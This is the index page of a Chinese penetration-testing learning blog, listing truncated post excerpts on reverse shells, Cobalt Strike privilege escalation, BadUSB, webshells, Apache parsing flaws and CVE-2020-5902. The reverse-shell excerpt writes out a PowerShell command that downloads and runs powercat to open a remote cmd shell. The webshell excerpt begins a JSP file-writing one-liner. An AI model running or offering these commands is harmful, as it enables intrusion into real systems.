<!DOCTYPE html>
<html>
<head>
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>小白帽</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="">
    <meta property="og:type" content="website">
<meta property="og:title" content="小白帽">
<meta property="og:url" content="https://www.yuque.com/xiaogege-yxttw/index.html">
<meta property="og:site_name" content="小白帽">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="无名之辈">
<meta name="twitter:card" content="summary">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu"  >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">无名之辈</h5>
          <a href="mailto:3389006233@qq.com" title="3389006233@qq.com" class="mail">3389006233@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect active">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/wakaka123wakaka" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">小白帽</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header index-header">

    <div class="container fade-scale">
        <h1 class="title">小白帽</h1>
        <h5 class="subtitle">
            
                
            
        </h5>
    </div>

    


</header>

<div class="container body-wrap">

    <ul class="post-list">
    
        <li class="post-list-item fade">
            <article id="post-pq62c9"
  class="article-card article-type-post" itemprop="blogPost">

    <div class="post-meta">
        <time class="post-time" title="2020-08-14 22:33:38" datetime="2020-08-14T14:33:38.000Z"  itemprop="datePublished">2020-08-14</time>

        


    </div>

    


  
    <h3 class="post-title" itemprop="name">
      <a class="post-title-link" href="/2020/08/14/pq62c9/">反弹shell</a>
    </h3>
  




    <div class="post-content" id="post-content" itemprop="postContent">

    
        windowspowercat 反弹 shell12powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.31.86:8000/powercat.ps1');powercat -c 192.168.31.86 -p 1122 -e cmd.exepowershell IEX (New-O...
    

        <a href="/2020/08/14/pq62c9/" class="post-more waves-effect waves-button">
            Continue reading...
        </a>
    </div>
    
</article>

        </li>
    
        <li class="post-list-item fade">
            <article id="post-gca6ds"
  class="article-card article-type-post" itemprop="blogPost">

    <div class="post-meta">
        <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

        


    </div>

    


  
    <h3 class="post-title" itemprop="name">
      <a class="post-title-link" href="/2020/08/06/gca6ds/">提权与hash读取</a>
    </h3>
  




    <div class="post-content" id="post-content" itemprop="postContent">

    
        Cobalt strike插件获取与加载
                
                    
                    
                
                image.png
            

                
                    
                    
 ...
    

        <a href="/2020/08/06/gca6ds/" class="post-more waves-effect waves-button">
            Continue reading...
        </a>
    </div>
    
</article>

        </li>
    
        <li class="post-list-item fade">
            <article id="post-rhhcg2"
  class="article-card article-type-post" itemprop="blogPost">

    <div class="post-meta">
        <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

        


    </div>

    


  
    <h3 class="post-title" itemprop="name">
      <a class="post-title-link" href="/2020/08/06/rhhcg2/">BadUSB制作</a>
    </h3>
  




    <div class="post-content" id="post-content" itemprop="postContent">

    
        1、工具制作1、digispark 开发板购买2、安装 arduino 的 IDE

                
                    
                    
                
                image.png
            
3、驱动安装链接: https://pan.baidu.com/s/1xISL...
    

        <a href="/2020/08/06/rhhcg2/" class="post-more waves-effect waves-button">
            Continue reading...
        </a>
    </div>
    
</article>

        </li>
    
        <li class="post-list-item fade">
            <article id="post-rqob7g"
  class="article-card article-type-post" itemprop="blogPost">

    <div class="post-meta">
        <time class="post-time" title="2020-08-06 22:49:23" datetime="2020-08-06T14:49:23.000Z"  itemprop="datePublished">2020-08-06</time>

        


    </div>

    


  
    <h3 class="post-title" itemprop="name">
      <a class="post-title-link" href="/2020/08/06/rqob7g/">命令执行写webshell</a>
    </h3>
  




    <div class="post-content" id="post-content" itemprop="postContent">

    
        1、jsp 版注意：针对 windows 需要通过^转义的字符包括&lt;&gt;和“针对 linux 需要通过\转义1、非菜刀版一句话
1&lt;%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))....
    

        <a href="/2020/08/06/rqob7g/" class="post-more waves-effect waves-button">
            Continue reading...
        </a>
    </div>
    
</article>

        </li>
    
        <li class="post-list-item fade">
            <article id="post-dlvqrg"
  class="article-card article-type-post" itemprop="blogPost">

    <div class="post-meta">
        <time class="post-time" title="2020-07-28 14:03:55" datetime="2020-07-28T06:03:55.000Z"  itemprop="datePublished">2020-07-28</time>

        


    </div>

    


  
    <h3 class="post-title" itemprop="name">
      <a class="post-title-link" href="/2020/07/28/dlvqrg/">中间件漏洞</a>
    </h3>
  




    <div class="post-content" id="post-content" itemprop="postContent">

    
        apache解析漏洞影响范围：1、apahce 与 php 是以 module 方式交互（phpinfo）2、apahce 全版本Apache 默认一个文件可以有多个以点分割的后缀，当最右边的后缀无法识别（不在 mime.types 文件内），则继续向左识别，直到识别到合法后缀才进行解析。
AddHandler 导致的解析漏洞httpd.conf 中存在
1AddHandler applic...
    

        <a href="/2020/07/28/dlvqrg/" class="post-more waves-effect waves-button">
            Continue reading...
        </a>
    </div>
    
</article>

        </li>
    
        <li class="post-list-item fade">
            <article id="post-pqp9in"
  class="article-card article-type-post" itemprop="blogPost">

    <div class="post-meta">
        <time class="post-time" title="2020-07-28 14:03:08" datetime="2020-07-28T06:03:08.000Z"  itemprop="datePublished">2020-07-28</time>

        


    </div>

    


  
    <h3 class="post-title" itemprop="name">
      <a class="post-title-link" href="/2020/07/28/pqp9in/">CVE-2020-5902：F5 BIG-IP 远程代码执行漏洞复现</a>
    </h3>
  




    <div class="post-content" id="post-content" itemprop="postContent">

    
        影响版本
BIG-IP 15.x: 15.1.0/15.0.0BIG-IP 14.x: 14.1.0 ~ 14.1.2BIG-IP 13.x: 13.1.0 ~ 13.1.3BIG-IP 12.x: 12.1.0 ~ 12.1.5BIG-IP 11.x: 11.6.1 ~ 11.6.5
环境搭建12下载https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP...
    

        <a href="/2020/07/28/pqp9in/" class="post-more waves-effect waves-button">
            Continue reading...
        </a>
    </div>
    
</article>

        </li>
    
    </ul>

    

</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>This blog is licensed under a <a rel="license noopener" href="https://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>无名之辈 &copy; 2015 - 2020</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://www.yuque.com/xiaogege-yxttw/&title=小白帽&pic=https://www.yuque.com/xiaogege-yxttw/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://www.yuque.com/xiaogege-yxttw/&title=小白帽&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.yuque.com/xiaogege-yxttw/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=小白帽&url=https://www.yuque.com/xiaogege-yxttw/&via=https://www.yuque.com/xiaogege-yxttw" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://www.yuque.com/xiaogege-yxttw/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: false };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



	<script type="text/javascript" src="hexo_resize_image.js"></script>
</body>
</html>
